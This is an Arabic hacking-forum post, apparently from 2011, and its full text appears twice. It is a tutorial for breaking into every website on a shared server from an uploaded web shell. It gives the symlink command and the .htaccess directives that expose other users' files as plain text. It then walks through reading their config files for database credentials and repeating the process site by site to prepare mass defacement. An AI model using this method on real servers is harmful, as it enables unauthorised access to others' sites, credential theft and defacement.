benzaxoll
04-08-2011, 05:14 AM
السلام عليكم جميعا ... كيفكم ... شو اخباركم ,,, احييكم من هذا المنبر الصريح باسم جيوش الهكر أعزائي تحية طيبة وبعد <<< شكله مطول :P
معليش بطول لأن هذا الشرح لن تجدوه في اي موقع ان كان أجنبي او عربي ولي يجيبلي شرح مثل لي انا واضعه خليه يرسلي رابط الموضوع فورااا !
المهم وبعد ما طلب مني الجميع على الماسنجر والرسائل الخاصة شرح فنكسر البرايفت !!
طبعا الكثير منكم شاهد في الاونة الأخيرة واهمها في معرض الانجازات اختراقات بالمئات تحصل ويتسائل البعض منكم عن سبب هذه الاختراقات التي تحصل بالمئات وكيف يتم ذلك والخ ...
ربما البعض يقول لوكلات برايفت وثغرات برامج والخ لكن في الحقيقة ليست كما تعتقدون ربما قليل منها جدا او يمكن ان نقول في حالات نادرة ! تحصل بترويت السيرفر لأن اغلب السيرفرات الأن اصبحت واعية تماما ولن تجد سيرفر الأن يعمل عليه لوكل والسبب في ذلك اصبحت كل من شركات توزيعات اللينكس تنبه عملائها عن وجود ثغرة في الكيرنل وتنبيه بتحديثه ... لن اتعمق كثيرا .... لكن فقط احببت ان اوضح لكم المسالة .
[الى عشاق النسخ واللصق هذا الشرح تم بواسطة benzaxoll من جيوش الهكرز]
المهم طريقة اختراق جميع مواقع السيرفر هي بسيطة نوعا ما لكن احتكرها الكثير لمدة طالت واحببت ان اكسر هذه العقدة ! تشاهدون احيانا في اي منتدى او في اي معرض انجازات اختراقات بالمئات تحصل وتقولو يا لهذا الهكر الكبير !! لكنكم مخطئون فعلا فالقصة كلها تعتمد على امر بسيط مع هتاكسس (سيكون مرفق بهذا الشرح ) ....
اولا لديك سيرفر مثلا عليه شيل او انت رافع شيل على اي موقع على السيرفر وبدك تخترق جميع مواقع السيرفر وتنزل انجاز بمئات المواقع فبكل بساطة وسأشرحها بخطوات ليسهل فهمها نبدا :
1- اعمل مجلد جديد عن طريق الشيل
2- انتقل للمجلد
3- ارفع الهتاكسس (Htaccess) " الذي سارفقه في هذا الشرح "
4- نفذ الأمر التالي :
ln -s /home/user/public_html benzaxoll.txt
مع مراعاة تغيير ال ( user ) الى يوزر الموقع لي انت عليه
5- استعرض اختصارك بهذه الطريقة
www.xxx.com/benzaxoll/benzaxoll.txt
xxx= اسم الموقع لي انت عليه
benzaxoll = اسم المجلد لي انت متواجد فيه ولي سويت فيه امر الاختصار !
benzaxoll.txt = الكنز ! اقصد اسم الأختصار الذي وضعته عند تنفيذك الأمر
[الى عشاق النسخ واللصق هذا الشرح تم بواسطة benzaxoll من جيوش الهكرز]
6- ستجد صفحة فيها اسماء مجلدات Directory وستجد بينهم مجلد اسمه home هذا المجلد تضغط عليه ليصبح رابط الموقع بالشكل التالي :
/www.xxx.com/benzaxoll/benzaxoll.txt/home
بعدها بتفتح لك الصفحة التعيسة Forbidden لكن لا تقلق كله له حل مع benzaxoll !
تروح تاخذ يوزر الموقع المراد الوصول اليه وتضعه بالرابط ليصبح بالشكل التالي :
/www.xxx.com/benzaxoll/benzaxoll.txt/home/user/public_html
مع مراعات تغيير user الى اسم اليوزر المراد تصفح ملفات موقعه
بعدها تفتح لك ملفات الموقع المراد الوصول اليه على شكل Directory listing وتقرا منها الكونفيج Config
7- تتصل بقواعد البيانات عن طريق سكربت الشهير MYSQL او SQL DUMPER او اي من هذه الأدوات تفي بالغرض ترفعها على السيرفر من الشيل وتستعرضها وبعدها تاخذ بيانات الكونفيج وتتصل عادي وتسوي لي تبيه بالموقع وهكذا وصلت للموقع المراد استهدافه
8- أكمل الطريقة مع كل مواقع السيرفر كل موقع تاخذ اليوزر حقه وتبدا من الخطوة رقم 6 وهكذا الى ان تنتهي من جميع مواقع السيرفر !
معلومة : يوجد سكربت يسهل عليك كل هذا ويقوم بأستخراج جميع يوزرات مع المواقع سيتم ارفاقه !
معلومة رقم 2 : يوجد سكربت برايفت يقوم باستخراج جميع كونفيجات السيرفر عبر هذه الطريقة ! سيتم وضعه ان شاء الله في الشرح القادم
طبعا بيجي واحد بقولي في كثير سكربتات تطلع لك كل كونفيجات السيرفر اقولك السكربتات كلها هذه معفنة ! واثبتت جدارتها بالفشل وما يطلع لك اكثر من 5 مواقع وكلها تعتمد على التخمين لكن السكربت لي معاي يقوم بهذه الطريقة بنفسه ويقوم بجمع كل يوزر واستخراج الكونيفج حقه اي 100 % وكما قلت سابقا سارفقه في المرة الجاي عشان هيك نكون كسرنا البرايفت مرتين :tongue: وسأضع بالشرح القادم سكربت يسوي ماس ديفيس بدون اي تعب منك وعن طريق الأختصار يعني فقط تضع بيانات الكونفيج لي استخرجلك ياهم السكربت السابق الذي شرحت عنه وهذا السكربت يتكفل بتغيير جميع صفحات الموقع الى صفحتك بدون صلاحية روت !
[الى عشاق النسخ واللصق هذا الشرح تم بواسطة benzaxoll من جيوش الهكرز]
الى هنا ننتهي من الشرح كنت اود ان اجعله شرح فيديو او بالصور لكن ليس لدي وقت لذلك فالسموحة من الجميع
ملاحظة : هذه الطريقة تنفع مع اصدار PHP 5.x.x اي جميع اصدارات الجيل الخامس من PHP وفي المرة القادمة اشرح كيف تتعامل مع اصدارات مختلفة بتغيير بسيط في الهتاكسس ...
الى اللقاء في شرح قادم
! جيوش الهكرز @benzaxoll
للاستفسار عن الدرس : [email protected]
ملف الهتاكسس ضع فيه هذه الأكواد واحفظه بأسم .htaccess ثم ارفعه كما في الخطوات
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
معليش بطول لأن هذا الشرح لن تجدوه في اي موقع ان كان أجنبي او عربي ولي يجيبلي شرح مثل لي انا واضعه خليه يرسلي رابط الموضوع فورااا !
المهم وبعد ما طلب مني الجميع على الماسنجر والرسائل الخاصة شرح فنكسر البرايفت !!
طبعا الكثير منكم شاهد في الاونة الأخيرة واهمها في معرض الانجازات اختراقات بالمئات تحصل ويتسائل البعض منكم عن سبب هذه الاختراقات التي تحصل بالمئات وكيف يتم ذلك والخ ...
ربما البعض يقول لوكلات برايفت وثغرات برامج والخ لكن في الحقيقة ليست كما تعتقدون ربما قليل منها جدا او يمكن ان نقول في حالات نادرة ! تحصل بترويت السيرفر لأن اغلب السيرفرات الأن اصبحت واعية تماما ولن تجد سيرفر الأن يعمل عليه لوكل والسبب في ذلك اصبحت كل من شركات توزيعات اللينكس تنبه عملائها عن وجود ثغرة في الكيرنل وتنبيه بتحديثه ... لن اتعمق كثيرا .... لكن فقط احببت ان اوضح لكم المسالة .
[الى عشاق النسخ واللصق هذا الشرح تم بواسطة benzaxoll من جيوش الهكرز]
المهم طريقة اختراق جميع مواقع السيرفر هي بسيطة نوعا ما لكن احتكرها الكثير لمدة طالت واحببت ان اكسر هذه العقدة ! تشاهدون احيانا في اي منتدى او في اي معرض انجازات اختراقات بالمئات تحصل وتقولو يا لهذا الهكر الكبير !! لكنكم مخطئون فعلا فالقصة كلها تعتمد على امر بسيط مع هتاكسس (سيكون مرفق بهذا الشرح ) ....
اولا لديك سيرفر مثلا عليه شيل او انت رافع شيل على اي موقع على السيرفر وبدك تخترق جميع مواقع السيرفر وتنزل انجاز بمئات المواقع فبكل بساطة وسأشرحها بخطوات ليسهل فهمها نبدا :
1- اعمل مجلد جديد عن طريق الشيل
2- انتقل للمجلد
3- ارفع الهتاكسس (Htaccess) " الذي سارفقه في هذا الشرح "
4- نفذ الأمر التالي :
ln -s /home/user/public_html benzaxoll.txt
مع مراعاة تغيير ال ( user ) الى يوزر الموقع لي انت عليه
5- استعرض اختصارك بهذه الطريقة
www.xxx.com/benzaxoll/benzaxoll.txt
xxx= اسم الموقع لي انت عليه
benzaxoll = اسم المجلد لي انت متواجد فيه ولي سويت فيه امر الاختصار !
benzaxoll.txt = الكنز ! اقصد اسم الأختصار الذي وضعته عند تنفيذك الأمر
[الى عشاق النسخ واللصق هذا الشرح تم بواسطة benzaxoll من جيوش الهكرز]
6- ستجد صفحة فيها اسماء مجلدات Directory وستجد بينهم مجلد اسمه home هذا المجلد تضغط عليه ليصبح رابط الموقع بالشكل التالي :
/www.xxx.com/benzaxoll/benzaxoll.txt/home
بعدها بتفتح لك الصفحة التعيسة Forbidden لكن لا تقلق كله له حل مع benzaxoll !
تروح تاخذ يوزر الموقع المراد الوصول اليه وتضعه بالرابط ليصبح بالشكل التالي :
/www.xxx.com/benzaxoll/benzaxoll.txt/home/user/public_html
مع مراعات تغيير user الى اسم اليوزر المراد تصفح ملفات موقعه
بعدها تفتح لك ملفات الموقع المراد الوصول اليه على شكل Directory listing وتقرا منها الكونفيج Config
7- تتصل بقواعد البيانات عن طريق سكربت الشهير MYSQL او SQL DUMPER او اي من هذه الأدوات تفي بالغرض ترفعها على السيرفر من الشيل وتستعرضها وبعدها تاخذ بيانات الكونفيج وتتصل عادي وتسوي لي تبيه بالموقع وهكذا وصلت للموقع المراد استهدافه
8- أكمل الطريقة مع كل مواقع السيرفر كل موقع تاخذ اليوزر حقه وتبدا من الخطوة رقم 6 وهكذا الى ان تنتهي من جميع مواقع السيرفر !
معلومة : يوجد سكربت يسهل عليك كل هذا ويقوم بأستخراج جميع يوزرات مع المواقع سيتم ارفاقه !
معلومة رقم 2 : يوجد سكربت برايفت يقوم باستخراج جميع كونفيجات السيرفر عبر هذه الطريقة ! سيتم وضعه ان شاء الله في الشرح القادم
طبعا بيجي واحد بقولي في كثير سكربتات تطلع لك كل كونفيجات السيرفر اقولك السكربتات كلها هذه معفنة ! واثبتت جدارتها بالفشل وما يطلع لك اكثر من 5 مواقع وكلها تعتمد على التخمين لكن السكربت لي معاي يقوم بهذه الطريقة بنفسه ويقوم بجمع كل يوزر واستخراج الكونيفج حقه اي 100 % وكما قلت سابقا سارفقه في المرة الجاي عشان هيك نكون كسرنا البرايفت مرتين :tongue: وسأضع بالشرح القادم سكربت يسوي ماس ديفيس بدون اي تعب منك وعن طريق الأختصار يعني فقط تضع بيانات الكونفيج لي استخرجلك ياهم السكربت السابق الذي شرحت عنه وهذا السكربت يتكفل بتغيير جميع صفحات الموقع الى صفحتك بدون صلاحية روت !
[الى عشاق النسخ واللصق هذا الشرح تم بواسطة benzaxoll من جيوش الهكرز]
الى هنا ننتهي من الشرح كنت اود ان اجعله شرح فيديو او بالصور لكن ليس لدي وقت لذلك فالسموحة من الجميع
ملاحظة : هذه الطريقة تنفع مع اصدار PHP 5.x.x اي جميع اصدارات الجيل الخامس من PHP وفي المرة القادمة اشرح كيف تتعامل مع اصدارات مختلفة بتغيير بسيط في الهتاكسس ...
الى اللقاء في شرح قادم
! جيوش الهكرز @benzaxoll
للاستفسار عن الدرس : [email protected]
ملف الهتاكسس ضع فيه هذه الأكواد واحفظه بأسم .htaccess ثم ارفعه كما في الخطوات
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php